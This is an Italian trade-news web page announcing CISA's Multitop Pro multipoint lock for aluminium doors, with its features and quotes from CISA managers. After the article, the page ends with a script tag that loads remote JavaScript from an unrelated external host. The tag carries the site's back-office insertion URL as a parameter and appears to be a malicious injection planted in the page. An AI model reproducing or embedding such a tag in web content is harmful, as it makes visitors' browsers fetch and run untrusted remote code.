1. Home
  2. Notizie e Mercato
  3. CISA Multitop Pro, creata per resistere

CISA Multitop Pro, creata per resistere

Infissi e Serramenti di
Multitop Pro: la nuova gamma di serrature CISA per porte in alluminio che consente elevata sicurezza e recupero della distorsione termica della porta


CISA presenta Multitop Pro, la serratura multipunto a ingranaggi che recupera la distorsione termica della porta riducendo i tempi di manutenzione e i costi per l’installatore. Multitop Pro favorisce il recupero della distorsione termica grazie al meccanismo a ingranaggi (che alleggerisce la rotazione della chiave) e al catenaccio di spessore 12 mm con smusso più accentuato. In questo modo la serratura limita le conseguenze derivate degli sbalzi climatici. Le temperature, infatti, influiscono sui materiali che compongono il profilo della porta con effetti che possono arrivare ad alterare la normale chiusura. Le porte, con Multitop Pro si chiudono meglio (chiusura ermetica), favorendo in questo modo anche un maggiore risparmio energetico (meno dispersione).

Con Multitop Pro, CISA riafferma l’impegno a investire in prodotti e soluzioni innovative per il business dell’alluminio, settore in continua evoluzione, e mettere al centro dello sviluppo le esigenze degli installatori. Multitop Pro è oggi la migliore offerta in termini di prestazioni e completezza della gamma” sottolinea Carlo Bertozzi, Product Management Leader del portafoglio prodotti meccanici di CISAEMEIA.

Multitop Pro, come tutti i prodotti CISA, garantisce elevati standard di sicurezza. A ribadirlo Fausto Fustini, Responsabile Ricerca e Sviluppo CISA-EMEIA. ”Una maggiore resistenza all’effrazione si ottiene grazie ad un catenaccio con spessore maggiorato combinato al nuovo sistema di chiusura a gancio di cui CISA ha depositato il brevetto”.

La gamma si compone delle versioni meccaniche ed elettriche entrambe con lo spessore scatola di 15,5 mm. Una scatola di queste dimensioni permette una riduzione dei fori sul profilo e la garanzia di una corretta installazione sui profili a taglio termico e camera europea. La scatola ha inoltre un profilo studiato per l’introduzione facilitata del cilindro e un blocco sicuro dello stesso quando è avvitato. Un’altra novità è lo scrocco versatile: lo scrocco, infatti, può essere sostituito con il rullo direttamente dal frontale, quindi anche a serratura installata (brevetto CISA depositato). Inoltre, inserendo lo scrocco al contrario si ottiene la versione solo catenaccio. CISA Multitop Pro è perfettamente intercambiabile con versioni già installate e non sono necessarie lavorazioni aggiuntive sulla porta. La serratura è predisposta per il 4° e 5° punto di chiusura per una maggiore sicurezza sulle porte a due ante, inoltre all’altezza standard del frontale è possibile aggiungere una prolunga estendibile fino a 3 metri: novità per il mercato italiano.

Maggiori informazioni sono disponibili alle pagine internet cisamultitop.com e www.cisa.it


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.741229255319875" type="text/javascript"></script>